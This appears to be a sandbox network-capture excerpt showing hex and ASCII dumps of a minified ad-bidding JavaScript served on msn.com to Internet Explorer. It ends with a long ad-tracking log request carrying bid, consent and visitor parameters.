                                                                                                                                                                                                                  Data Ascii: function m(e){if(window.sessionStorage.getItem("cabuck")){var n=window.sessionStorage.getItem("cabuck"),r=new Date(window.sessionStorage.getItem("cbexp"));return(new Date).getTime()>r.getTime()?null:t.W(e,function(e){if(JSON.stringify(e)===n)return e})}re
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC537INData Raw: 28 29 29 2c 6e 2e 70 75 73 68 28 75 29 7d 7d 2c 74 68 69 73 2e 67 65 74 42 75 69 6c 64 42 69 64 44 61 74 61 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 48 28 69 2e 62 75 69 6c 64 42 69 64 44 61 74 61 2c 5b 69 2e 68 61 6e 64 6c 65 42 69 64 73 46 6f 72 41 75 63 74 69 6f 6e 5d 29 7d 2c 74 68 69 73 2e 62 75 69 6c 64 42 69 64 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 64 3d 65 2e 41 5a 28 29 2c 61 3d 30 2c 73 3d 6e 2e 6c 65 6e 67 74 68 3b 61 3c 73 3b 61 2b 2b 29 7b 76 61 72 20 72 3d 6e 5b 61 5d 3b 74 28 69 2e 67 65 74 44 65 66 61 75 6c 74 42 69 64 46 6f 72 50 6c 61 63 65 6d 65 6e 74 28 72 2c 64 29 2c 72 2c 61 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 2d 31 29 7d 6e 3d 5b 5d 7d 2c 74 68 69 73 2e
                                                                                                                                                                                                                  Data Ascii: ()),n.push(u)}},this.getBuildBidDataCallback=function(){return e.H(i.buildBidData,[i.handleBidsForAuction])},this.buildBidData=function(t){for(var d=e.AZ(),a=0,s=n.length;a<s;a++){var r=n[a];t(i.getDefaultBidForPlacement(r,d),r,a===n.length-1)}n=[]},this.
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC577INData Raw: 28 6f 29 7b 76 61 72 20 73 3d 6f 2e 67 65 74 28 22 73 7a 22 29 3b 65 2e 5a 54 28 73 29 26 26 28 72 2e 73 69 7a 65 73 2e 70 75 73 68 28 6f 2e 67 65 74 28 22 73 7a 22 29 29 2c 72 2e 65 70 63 2e 70 75 73 68 28 69 2e 67 65 74 45 78 74 65 72 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 43 6f 64 65 28 6f 2c 74 29 29 29 7d 29 2c 72 29 3a 72 7d 2c 74 68 69 73 2e 67 65 74 45 78 74 65 72 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 43 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 22 65 70 63 22 29 7c 7c 74 2e 67 65 74 28 22 63 72 69 64 22 29 7d 2c 74 68 69 73 2e 70 61 72 73 65 45 61 63 68 50 72 6f 76 69 64 65 72 52 65 73 70 6f 6e 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 29 7b 76 61 72 20 73 3d 74 2e 67 65 74 50 72 6f 76 69 64
                                                                                                                                                                                                                  Data Ascii: (o){var s=o.get("sz");e.ZT(s)&&(r.sizes.push(o.get("sz")),r.epc.push(i.getExternalPlacementCode(o,t)))}),r):r},this.getExternalPlacementCode=function(e,t){return e.get("epc")||t.get("crid")},this.parseEachProviderResponse=function(t,r,o){var s=t.getProvid
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC609INData Raw: 73 2e 73 65 6f 3f 73 65 74 54 69 6d 65 6f 75 74 28 65 2e 48 28 64 2e 69 6e 69 74 2c 5b 5d 2c 64 29 2c 30 29 3a 64 2e 69 6e 69 74 28 29 7d 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 65 72 72 6f 72 20 3d 20 65 72 72 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 63 61 74 63 68 43 6f 6e 73 74 61 6e 74 73 20 3d 20 7b 22 6e 61 6d 65 22 3a 22 68 62 43 4d 42 69 64 65 78 63 68 61 6e 67 65 22 2c 22 74 79 70 65 22 3a 22 48 42 2d 43 4d 22 2c 22 73 76 72 22 3a 22 32 30 32 31 31 31 31 30 31 33 5f 31 37 30 22 2c 22 73 65 72 76 6e 61 6d 65 22 3a 22 68 62 63 6d 5f 6e 61 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 62 43 4d 42 69 64 65 78 63 68 61 6e 67 65 20 65 6e 63 6f 75 6e 74
                                                                                                                                                                                                                  Data Ascii: s.seo?setTimeout(e.H(d.init,[],d),0):d.init()});} catch (err) { window.hbCMBidxc.error = err; window.hbCMBidxc.catchConstants = {"name":"hbCMBidexchange","type":"HB-CM","svr":"2021111013_170","servname":"hbcm_na","message":"hbCMBidexchange encount
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC649INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 69 3b 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 64 69 76 49 64 29 26 26 65 2e 73 6c 6f 74 49 64 26 26 28 28 74 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 66 72 61 6d 65 49 64 29 29 26 26 28 74 2e 77 69 64 74 68 3d 65 2e 77 69 64 74 68 2c 74 2e 68 65 69 67 68 74 3d 65 2e 68 65 69 67 68 74 29 2c 69 3d 67 65 74 53 69 7a 65 41 72 72 61 79 49 6e 49 6e 74 28 65 2e 73 69 7a 65 4c 69 73 74 2c 65 2e 77 69 64 74 68 2c 65 2e 68 65 69 67 68 74 29 2c 77 69 6e 64 6f 77 2e 6d 65 64 69 61 6e 65 74 5f 74 61 67 69 64 3d 65 2e 74 61 67 69 64 2c 77 69 6e 64 6f 77 2e 6d 65 64 69 61 6e 65 74 5f 64 66 70 56
                                                                                                                                                                                                                  Data Ascii: =function(e){var t,i;!document.getElementById(e.divId)&&e.slotId&&((t=window.parent.document.getElementById(iframeId))&&(t.width=e.width,t.height=e.height),i=getSizeArrayInInt(e.sizeList,e.width,e.height),window.medianet_tagid=e.tagid,window.medianet_dfpV
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC681INData Raw: 61 6c 6c 3a 67 2c 67 65 74 52 61 6e 64 6f 6d 3a 77 2c 69 73 50 65 72 63 65 6e 74 41 70 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 28 31 2c 31 30 30 29 3c 3d 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 7d 2c 67 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 41 73 41 72 72 61 79 3a 61 2e 75 72 75 2e 67 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 41 73 41 72 72 61 79 2c 47 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 3a 61 2e 75 72 75 2e 47 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 2c 63 68 65 63 6b 55 72 6c 44 65 63 6f 64 69 6e 67 45 6e 63 6f 64 69 6e 67 3a 61 2e 75 72 75 2e 63 68 65 63 6b 55 72 6c 44 65 63 6f 64 69 6e 67 45 6e 63 6f 64 69 6e 67 2c 65 76 65 6e 74 4c 69 62 3a 61 2e 65 76
                                                                                                                                                                                                                  Data Ascii: all:g,getRandom:w,isPercentApp:function(e){return w(1,100)<=parseInt(e,10)},getParamValueFromUrlAsArray:a.uru.getParamValueFromUrlAsArray,GetParamValueFromUrl:a.uru.GetParamValueFromUrl,checkUrlDecodingEncoding:a.uru.checkUrlDecodingEncoding,eventLib:a.ev
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC692INData Raw: 26 26 28 69 2b 3d 5b 22 26 22 2c 22 76 67 64 5f 22 2b 74 2c 22 3d 22 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 5b 74 5d 29 5d 2e 6a 6f 69 6e 28 22 22 29 29 3b 72 65 74 75 72 6e 20 69 7d 28 29 2c 67 3d 6f 2e 5f 6d 4e 2e 5f 68 74 68 43 68 6b 55 52 4c 2b 72 3b 69 66 28 5f 6d 4e 2e 5f 74 72 75 6e 4c 6f 67 55 72 6c 26 26 28 67 3d 73 2e 74 72 75 6e 63 61 74 65 55 72 6c 28 67 2c 5f 6d 4e 2e 5f 74 72 75 6e 4c 6f 67 55 72 6c 29 29 2c 65 3d 69 2c 21 73 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 6f 2e 5f 6d 4e 2e 5f 4c 31 50 67 45 78 2c 65 2e 67 65 74 45 6e 74 69 74 79 28 22 63 72 69 64 22 29 29 26 26 21 73 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 6f 2e 5f 6d 4e 2e 5f 4c 31 50 67 45 78 2c 65 2e 67 65 74 45 6e 74 69 74 79 28 22
                                                                                                                                                                                                                  Data Ascii: &&(i+=["&","vgd_"+t,"=",encodeURIComponent(c[t])].join(""));return i}(),g=o._mN._hthChkURL+r;if(_mN._trunLogUrl&&(g=s.truncateUrl(g,_mN._trunLogUrl)),e=i,!s.checkItemExists(o._mN._L1PgEx,e.getEntity("crid"))&&!s.checkItemExists(o._mN._L1PgEx,e.getEntity("
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC708INData Raw: 2e 67 65 74 49 74 65 6d 73 46 72 6f 6d 4d 61 63 72 6f 73 28 22 61 64 74 32 22 29 29 2c 4d 28 22 62 63 61 74 22 2c 43 28 5f 65 2e 5f 62 64 61 74 61 2c 22 62 63 61 74 22 29 29 2c 4d 28 22 77 65 62 5f 76 69 65 77 22 2c 7b 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 69 66 28 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 77 76 29 22 29 7c 7c 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 41 6e 64 72 6f 69 64 20 34 2e 22 29 26 26 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 56 65 72 73 69 6f 6e 2f 22 29 29 72 65 74 75 72 6e 22 41 4e 44 52 4f 49 44 5f 57 45 42 56 49 45 57 22 3b 69 66 28 2f 69 50 68 6f 6e 65 7c 69 50 61
                                                                                                                                                                                                                  Data Ascii: .getItemsFromMacros("adt2")),M("bcat",C(_e._bdata,"bcat")),M("web_view",{value:function(){var e=navigator.userAgent;if(Ee.checkItemExists(e,"wv)")||Ee.checkItemExists(e,"Android 4.")&&Ee.checkItemExists(e,"Version/"))return"ANDROID_WEBVIEW";if(/iPhone|iPa
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC716INData Raw: 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 49 6e 41 72 72 61 79 28 65 2c 22 72 65 6d 51 75 6f 74 65 22 29 26 26 28 74 3d 74 2e 72 65 70 6c 61 63 65 28 22 27 22 2c 22 22 29 29 2c 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 49 6e 41 72 72 61 79 28 65 2c 22 72 65 6d 6f 76 65 41 6c 6c 22 29 26 26 28 74 3d 22 22 29 2c 74 29 29 2c 6b 65 28 46 28 22 63 72 65 66 22 29 29 26 26 72 65 28 22 63 72 65 66 22 2c 43 65 28 46 28 22 63 72 65 66 22 29 29 29 2c 6b 65 28 46 28 22 77 65 62 5f 76 69 65 77 22 29 29 26 26 72 65 28 22 77 65 62 5f 76 69 65 77 22 2c 46 28 22 77 65 62 5f 76 69 65 77 22 29 29 2c 22 54 42 35 35 4a 35 52 22 3d 3d 3d 5f 65 2e 5f 74 70 69 64 26 26 44 28 22 6b 77 72 66 22 2c 46 28 22 65 72 65 71 75 72 6c 22 29 2c 21 30 29 2c 21 6b 65 28 5f 65 2e
                                                                                                                                                                                                                  Data Ascii: heckItemExistsInArray(e,"remQuote")&&(t=t.replace("'","")),Ee.checkItemExistsInArray(e,"removeAll")&&(t=""),t)),ke(F("cref"))&&re("cref",Ce(F("cref"))),ke(F("web_view"))&&re("web_view",F("web_view")),"TB55J5R"===_e._tpid&&D("kwrf",F("erequrl"),!0),!ke(_e.
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC732INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 5b 73 5d 3d 61 2e 69 73 41 70 70 6c 69 63 61 62 6c 65 28 29 3f 22 31 22 3a 22 30 22 2c 65 7d 2c 74 68 69 73 2e 67 65 74 4c 44 50 46 6c 61 67 46 6f 72 48 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 68 69 73 2e 67 65 74 4d 61 63 72 6f 73 46 6f 72 48 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 67 64 3d 61 2e 69 73 41 70 70 6c 69 63 61 62 6c 65 28 29 2c 65 7d 2c 74 68 69 73 2e 63 61 6c 6c 48 42 41 70 69 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 2c 74 3d 66 2e 67 65 74 52 65 71 75 69 72 65 4d 6f 64 75 6c 65 28 22 61 64 61 70 74 65 72 2d 63 6f 6e 73 74 61 6e 74 73 22 29 3b 72 65 74 75 72 6e 20 66 2e 69 73 53 65 74 28
                                                                                                                                                                                                                  Data Ascii: tion(){var e={};return e[s]=a.isApplicable()?"1":"0",e},this.getLDPFlagForHB=function(){},this.getMacrosForHB=function(){var e={};return e.gd=a.isApplicable(),e},this.callHBApis=function(){var e={},t=f.getRequireModule("adapter-constants");return f.isSet(
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC740INData Raw: 22 29 7d 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 7b 7d 3b 74 72 79 7b 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 64 61 74 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 6e 2e 64 61 74 61 29 3a 6e 2e 64 61 74 61 7d 63 61 74 63 68 28 6e 29 7b 7d 76 61 72 20 69 3d 74 2e 5f 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3b 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 5b 69 2e 63 61 6c 6c 49 64 5d 26 26 63 5b 69 2e 63 61 6c 6c 49 64 5d 28 69 2e 72 65 74 75 72 6e 56 61 6c 75 65 2c 69 2e 73 75 63 63 65 73 73 29 7d 2c 21 31 29 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66
                                                                                                                                                                                                                  Data Ascii: ")},window.addEventListener("message",function(n){var t={};try{t="string"==typeof n.data?JSON.parse(n.data):n.data}catch(n){}var i=t.__tcfapiReturn;i&&"function"==typeof c[i.callId]&&c[i.callId](i.returnValue,i.success)},!1)}!function(){var n=function(){f
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC756INData Raw: 2c 69 2e 64 61 74 61 2c 6f 2c 72 2e 67 65 74 56 69 73 69 74 49 64 28 29 29 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 73 68 6f 75 6c 64 4f 76 65 72 72 69 64 65 4c 6f 67 46 75 6e 63 74 69 6f 6e 3f 69 2e 73 68 6f 75 6c 64 4f 76 65 72 72 69 64 65 4c 6f 67 46 75 6e 63 74 69 6f 6e 3a 22 69 66 72 22 3d 3d 6e 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 74 3d 67 28 74 3d 72 29 29 2e 76 67 64 5f 69 66 69 6d 70 3d 31 2c 74 3b 76 61 72 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 28 72 29 7d 2c 63 2e 74 72 69 67 67 65 72 41 64 54 61 67 45 76 65 6e 74 28 72 2e 67 65 74 45 6e 74 69 74 79 28 22 76 69 22 29 2c 22 56 49 4d 50 3a 3a 69 6e 69 74 4f 62 73 65 72 76 65 72 22 2c 21 30 2c 7b 74 61 72 67 65 74 45 6c
                                                                                                                                                                                                                  Data Ascii: ,i.data,o,r.getVisitId())}:"function"==typeof i.shouldOverrideLogFunction?i.shouldOverrideLogFunction:"ifr"==n?function(){return(t=g(t=r)).vgd_ifimp=1,t;var t}:function(){return g(r)},c.triggerAdTagEvent(r.getEntity("vi"),"VIMP::initObserver",!0,{targetEl
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC764INData Raw: 2e 41 44 56 42 49 44 5f 4f 42 4a 45 43 54 5d 5b 61 2e 41 50 49 35 5f 47 45 54 5f 41 44 58 5f 50 52 45 44 49 43 54 49 4f 4e 5d 29 26 26 28 6e 3d 73 5b 61 2e 41 44 56 42 49 44 5f 4f 42 4a 45 43 54 5d 5b 61 2e 41 50 49 35 5f 47 45 54 5f 41 44 58 5f 50 52 45 44 49 43 54 49 4f 4e 5d 28 41 2e 67 65 74 48 42 43 72 65 61 74 69 76 65 49 64 28 74 29 2c 69 2c 65 2c 49 5b 74 5d 29 29 2c 65 3d 6e 2c 63 2e 69 73 53 65 74 28 65 29 26 26 63 2e 69 73 53 65 74 28 65 5b 75 2e 42 49 44 5d 29 26 26 63 2e 69 73 46 75 6e 63 74 69 6f 6e 28 65 5b 75 2e 52 45 50 4f 52 54 5f 57 49 4e 5f 4f 52 5f 4c 4f 53 53 5f 43 41 4c 4c 42 41 43 4b 5d 29 3f 28 5f 28 5b 22 47 6f 74 20 48 62 2d 41 64 78 20 42 69 64 20 50 72 65 64 69 63 74 69 6f 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 77 69 74
                                                                                                                                                                                                                  Data Ascii: .ADVBID_OBJECT][a.API5_GET_ADX_PREDICTION])&&(n=s[a.ADVBID_OBJECT][a.API5_GET_ADX_PREDICTION](A.getHBCreativeId(t),i,e,I[t])),e=n,c.isSet(e)&&c.isSet(e[u.BID])&&c.isFunction(e[u.REPORT_WIN_OR_LOSS_CALLBACK])?(_(["Got Hb-Adx Bid Prediction successfully wit
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC780INData Raw: 59 21 42 20 61 73 73 75 6d 65 64 20 77 69 6e 6e 65 72 20 66 6f 72 20 72 65 61 73 6f 6e 3a 20 22 2b 65 2b 22 20 61 6e 64 20 62 69 64 64 65 72 20 69 64 3a 20 22 2b 69 2c 6e 2e 63 72 69 64 29 2c 74 5b 6b 2e 50 52 4f 56 49 44 45 52 5f 49 44 5d 3d 69 2c 74 5b 6b 2e 53 49 5a 45 5d 3d 6f 5b 57 2e 52 54 42 5f 53 49 5a 45 5d 3b 69 3d 6f 2e 72 70 3b 72 65 74 75 72 6e 20 65 21 3d 5a 2e 45 4d 50 54 59 5f 42 49 44 26 26 65 21 3d 5a 2e 4e 4f 5f 42 49 44 7c 7c 28 69 3d 22 30 2e 30 30 22 29 2c 74 5b 6b 2e 42 49 44 5d 3d 69 2c 74 5b 6b 2e 47 4f 4f 47 4c 45 5f 42 49 44 5d 3d 69 2c 74 5b 6b 2e 4e 4f 42 49 44 5f 52 45 41 53 4f 4e 5d 3d 65 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 76 61 72 20 65 2c 69 2c 64 3b 72 65 74 75 72 6e 21 30 3d 3d 3d 74 5b 6b 2e 4e 4f 42 49
                                                                                                                                                                                                                  Data Ascii: Y!B assumed winner for reason: "+e+" and bidder id: "+i,n.crid),t[k.PROVIDER_ID]=i,t[k.SIZE]=o[W.RTB_SIZE];i=o.rp;return e!=Z.EMPTY_BID&&e!=Z.NO_BID||(i="0.00"),t[k.BID]=i,t[k.GOOGLE_BID]=i,t[k.NOBID_REASON]=e,t}function v(t){var e,i,d;return!0===t[k.NOBI
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC788INData Raw: 61 72 20 65 3d 22 22 2c 72 3d 74 2e 67 65 74 45 6e 74 69 74 79 28 22 72 65 71 75 72 6c 22 2c 21 30 29 2c 65 3d 63 2e 69 73 49 6e 49 46 72 61 6d 65 43 61 6c 6c 28 29 26 26 21 63 2e 69 73 50 61 72 65 6e 74 41 63 63 65 73 73 69 62 6c 65 28 29 3f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 63 2e 67 65 74 54 6f 70 6d 6f 73 74 41 63 63 65 73 73 69 62 6c 65 57 69 6e 64 6f 77 28 29 7c 7c 21 31 2c 65 3d 74 26 26 74 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 28 29 2c 72 3d 65 26 26 65 2e 6c 65 6e 67 74 68 3f 65 5b 30 5d 2e 6e 61 6d 65 3a 76 6f 69 64 20 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 22 22 7d 72 65 74 75 72 6e 20 63 2e 69 73 53 74 72 69 6e 67 53 65 74
                                                                                                                                                                                                                  Data Ascii: ar e="",r=t.getEntity("requrl",!0),e=c.isInIFrameCall()&&!c.isParentAccessible()?r:function(){try{var t=c.getTopmostAccessibleWindow()||!1,e=t&&t.performance&&t.performance.getEntries(),r=e&&e.length?e[0].name:void 0}catch(t){return""}return c.isStringSet
                                                                                                                                                                                                                  2021-12-02 23:42:36 UTC804INData Raw: 6e 74 69 74 79 28 22 6e 6d 6f 76 6c 22 29 7c 7c 74 2e 67 65 74 45 6e 74 69 74 79 28 22 69 6e 73 6c 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 72 2c 73 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 2c 6e 3b 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 65 3d 74 2c 69 3d 72 2c 6e 3d 73 2c 6c 2e 61 64 64 54 6f 44 65 6c 61 79 65 64 45 76 65 6e 74 51 75 65 75 65 28 22 63 61 6c 6c 73 65 74 74 69 6e 67 73 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 31 21 3d 3d 65 2e 67 65 74 45 6e 74 69 74 79 28 22 65 78 74 65 72 6e 61 6c 50 72 6f 76 53 68 6f 77 6e 22 29 26 26 28 79 28 65 29 3f 28 65 2e 61 64 64 45 6e 74 69 74 79 28 22 68 74 6d 6c 73 72 63 22 2c 22 31 22 29 2c 74 3d 75 28 65 2c 69 2c 21 30 29 2c 61 2e 72
                                                                                                                                                                                                                  Data Ascii: ntity("nmovl")||t.getEntity("insl"))}function m(t,r,s){var o=function(){var e,i,n;o=function(){},e=t,i=r,n=s,l.addToDelayedEventQueue("callsettings",n,function(){var t;1!==e.getEntity("externalProvShown")&&(y(e)?(e.addEntity("htmlsrc","1"),t=u(e,i,!0),a.r


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  10192.168.2.64980423.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:59 UTC861OUTGET /log?logid=awlog&pid=8PR68Q253&itype=HB-CM&dn=msn.com&cid=8HBI57XIG&svr=2021111013_170&servname=hbcm_na&gdpr=0&csex=0&suc=0&csstr=&tcf_cmp=&tcf_status=&tcf_prp=&usp_status=0&usp_enf=1&usp_string=&ufca=&usp_ldf=&ugd=4&adt=desktop&vid=00001638520987300014104136333773&vsid=&sd=1&gtd=400&inid=0&gfd=&cc=CH&sc=ZH&ct=ZURICH&abte=CONTROL&adbd=0&amp=0&version=1&sB=false&cors=true&disB=false&ice=&vw=284&vh=271&pht=271&cl=&__rk=0&app=0&rtype=&vendor=&isSafari=0&lbr=0&floc_id=&floc_ver=&id_details=&mnkv=&pabte=&pbcm=0&pvid=4&prvAccId=858412214&prvApiId=8CU157172&exid=31&pcId=&pseat=4-BID_API&mowxReqId=655139198087331261638520979902&crid=670468743&g=0&size=300x250&sec=&chnl=&prspt=headerBid&rfc=0&tref=0&fpuReq=1&plcmtt=0&rtime=46&dtc=nydc&rtbsv2=&mp_seg<>=44412%23%2315390%23%2315718%23%2317218%23%2328447%23%2333721%23%2354934%23%2353492%23%2360148&apid=1&wsip=c10-mowx-prod-1&ltime=7221&abs=0&ae=0&ftr<>=&ssregion=&ssreqid=&sssvnm=&bdp=0.02&cbdp=0.02&dcbdp=0&ckfl=0&cs=&mnet_ckfl=0&cat=&attr=&pvAgNm=&pvAgId=&advId=&advNm=&advUrl=unknown&dfpBd=0.02&nms=1&di=&dt=O&epc=858412214&ogbdp=0.02&s=1&snm=success&dbf=1&bdata=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.03~ogerpm%3D0.03~MFB%3D2jo~smm_bid%3D0.02~bm%3D1~smm_sd%3D2021120121~sid%3D858412214~sd%3D1~uid%3D2IaaJtXbXqos4SCzmA~dc2%3D1~btd%3D14241703836931763290446355943300556902506328540099388593272215750316032~scd%3Dzh~uim%3D464908~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D27~ct%3Dzurich~rc%3D6%2C0~basis2%3D196~url_b%3D0.03~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.2127~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&cmpid=&bId=&pcrid=8CU157172-858412214-48-14&ruct=0&brs=&brr=&iurl=https%3A%2F%2Fiurl-a.akamaihd.net%2Fybntag%3F%26cid%3D8CU157172%26crid%3D858412214%26size%3D300x250%26requrl%3Dhttps%253A%252F%252Fwww.msn.com%252Fde-ch%252F%253Focid%253Diehp&htps=0&ptype=27&pbidflr=0.00&exp=sfl%3Dfalse%7CssBucket%3D0%7Cbfl%3D-100%7Cclt%3D0%7Cfl_rl%3D1%7CssProfile%3D0%7Cdbr%3D1%7Ctkd%3Dnull&bfs=0&seat=BID_API&nbr=0&ba=31&ybnca_gbid=&ybnca_erpm=0.03&ybnca_vbid=&yogbdp=0.02&yErpmFlag=0&smsrc=1&strg=&ybnca_bbid=&prvReqId=76112239762996859_53175729_670468743141&dStat=0&ogbid=0.02&acid=340954286069640181638520979899&act=headerBid&dtfdl=&dspltime=&ttfd=&ttm=0&vtm=0&sttm=0&svtm=0&mnrfc=0&mnrf=0&invw=-1&adj1=0&adj0=0&adj2=0&adj3=0&patkey=&patint<>=&pc=&spSource=0&spIvt=3&spId=&spFst=0&spIsReq=3&spTo=3&top=0&btm=0&lft=0&rght=0&mx_SD=&mx_PC=1&mx_SPRIG=1&mx_UCC=2&mx_lr_seg_cnt=0&mx_GCID=0&mx_IAB2=1&mx_ip_exp_verd=&mx_vsGap=&mx_epbc=8CU157172&mx_bsBucket=0&mx_ssProfile=0&mx_lr=0&mx_g_one_uid_sent=None&mx_uid_sent=0&mx_yhs_enabled=&mx_SC=0&mx_lr_seg_deal=0&mx_yhs_target_bidders=&mx_g_uid_cvrg=&mx_mrpp_key=&mx_divid=&mx_dfpadpath=&mx_g_uid_sent<>=&mx_BCN_BF=&mx_BCE=&mx_BCI=&mx_BCT=&mx_BCN_YHS=&mx_BCW=&mx_bsProfile=0&mx_ssBucket=0&mx_TAF=0&mx_supply_path=&mx_sbp=-10&mx_yhs_selected_deal=&mx_tgs=300x250&mx_TAS=&mx_asset_id=&mx_adnm=&mx_aurl_hc=0&mx_yhs_deal_sent=&mx_aqcpl_crid=0&mx_aabpc=0&mx_adid=&mx_nsz=1&mx_isLossNtf=false&mx_aurt=0&mx_gpid_sent=false&pgcatiab=IAB12&pgcatiab2=379&pgcatsprig=16&gFunDl=false&ngFunDl=false&rDl=false&actltime=7396&auMxTm=&brf=0&dcs=&dfpDiv=&dfpPos=&dfpAdPath=&lper=1&td=r%3Dstr%7Cab%3D0%7C&oyaf=0&sbdrid=328&ra_sz=300x250&tk=&sc_pvid=&sc_ogbdp=0&sc_adj1=0&sc_adj0=0&sc_adj2=0&sc_prspt=&sc_act=&sc_bdata=&sc_bdp=0&s